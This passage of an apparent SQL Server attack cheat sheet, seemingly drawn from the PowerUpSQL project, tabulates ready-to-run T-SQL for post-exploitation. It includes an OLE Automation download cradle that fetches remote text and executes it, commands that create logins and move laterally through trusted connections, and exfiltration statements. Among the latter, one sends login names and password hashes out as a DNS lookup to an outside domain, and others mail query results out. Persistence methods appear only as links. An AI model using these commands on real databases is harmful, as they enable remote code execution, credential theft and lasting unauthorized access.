| Download cradle: OLE Automation Procedure 2 (TSQL) | /* OLE Automation Procedure - Download Cradle Example - Option 2. Can handle larger payloads, but requires a table. Note: this also works with UNC paths (\\ip\file.txt) and with WebDAV paths (\\ip@80\file.txt); the target web server needs to support PROPFIND. */ /* Setup variables */ DECLARE @url varchar(300); DECLARE @WinHTTP int; DECLARE @Handle int; DECLARE @Command varchar(8000); /* Set target URL containing TSQL */ SET @url = 'http://127.0.0.1/mycmd.txt'; /* Create temp table to store the downloaded string */ CREATE TABLE #text(html text NULL); /* Setup namespace */ EXEC @Handle=sp_OACreate 'WinHttp.WinHttpRequest.5.1',@WinHTTP OUT; /* Call the Open method to configure the HTTP request */ EXEC @Handle=sp_OAMethod @WinHTTP, 'Open',NULL,'GET',@url,'false'; /* Call the Send method to send the HTTP request */ EXEC @Handle=sp_OAMethod @WinHTTP,'Send'; /* Capture the HTTP response content */ INSERT #text(html) EXEC @Handle=sp_OAGetProperty @WinHTTP,'ResponseText'; /* Destroy the object */ EXEC @Handle=sp_OADestroy @WinHTTP; /* Display the command */ SELECT @Command = html from #text; SELECT @Command; /* Run the command */ EXECUTE (@Command); /* Remove temp table */ DROP TABLE #text |
| Read file (TSQL) | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenDataSourceTxt.sql https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_BulkInsert.sql https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenDataSourceXlsx https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetBulk.sql https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetTxt.sql https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetXlsx.sql |
| Write file (TSQL) | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/writefile_bulkinsert.sql https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/writefile_OpenRowSetTxt.sql |

Lateral Movement

* Requires a privileged user

| Description | Statement |
| --- | --- |
| Create a user | EXEC sp_addlogin 'user', 'pass'; |
| Delete a user | EXEC sp_droplogin 'user'; |
| Link crawling | https://blog.netspi.com/sql-server-link-crawling-powerupsql/ |
| Connect to a remote database as the current service account. Note: requires sysadmin. | SELECT * FROM OPENDATASOURCE('SQLNCLI', 'Server=MSSQLSRV04\SQLSERVER2016;Trusted_Connection=yes;').master.dbo.sysdatabases |

Data Exfiltration

Note: DNS requests can be issued from MSSQL. However, this requires administrator privileges and SQL Server 2005.

| Description | Statement |
| --- | --- |
| Make a DNS request | DECLARE @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + 'netspi.com' from sys.sql_logins;exec('xp_fileexist "\\' + @host + '\c$\boot.ini"'); |
| UNC path (DNS request) | xp_dirtree '\\data.domain.com\file' |
| Enable sp_send_dbmail and send a query | sp_configure 'show advanced options', 1;RECONFIGURE;sp_configure 'Database Mail XPs', 1;RECONFIGURE;exec msdb..sp_send_dbmail @recipients='harold@netspi.com',@query='select @@version'; |
| Basic xp_sendmail query | EXEC master..xp_sendmail 'harold@netspi.com', 'This is a test.' |
| Send a full email with xp_sendmail | EXEC xp_sendmail @recipients='harold@netspi.com', @message='This is a test.', @copy_recipients='test@netspi.com', @subject='TEST' |
| Send query results via xp_sendmail | EXEC xp_sendmail 'harold@netspi.com', @query='SELECT @@version'; |
| Send query results as an attachment via xp_sendmail | CREATE TABLE ##texttab (c1 text); INSERT ##texttab values ('Put message here.'); DECLARE @cmd varchar(56); SET @cmd = 'SELECT c1 from ##texttab'; EXEC master.dbo.xp_sendmail 'robertk', @query = @cmd, @no_header='TRUE'; DROP TABLE ##texttab |

Persistence

| Description | Statement |
| --- | --- |
| Startup stored procedures | https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/ |
| Triggers | https://blog.netspi.com/maintaining-persistence-via-sql-server-part-2-triggers/ |
| Regwrite | https://blog.netspi.com/establishing-registry-persistence-via-sql-server-powerupsql/ |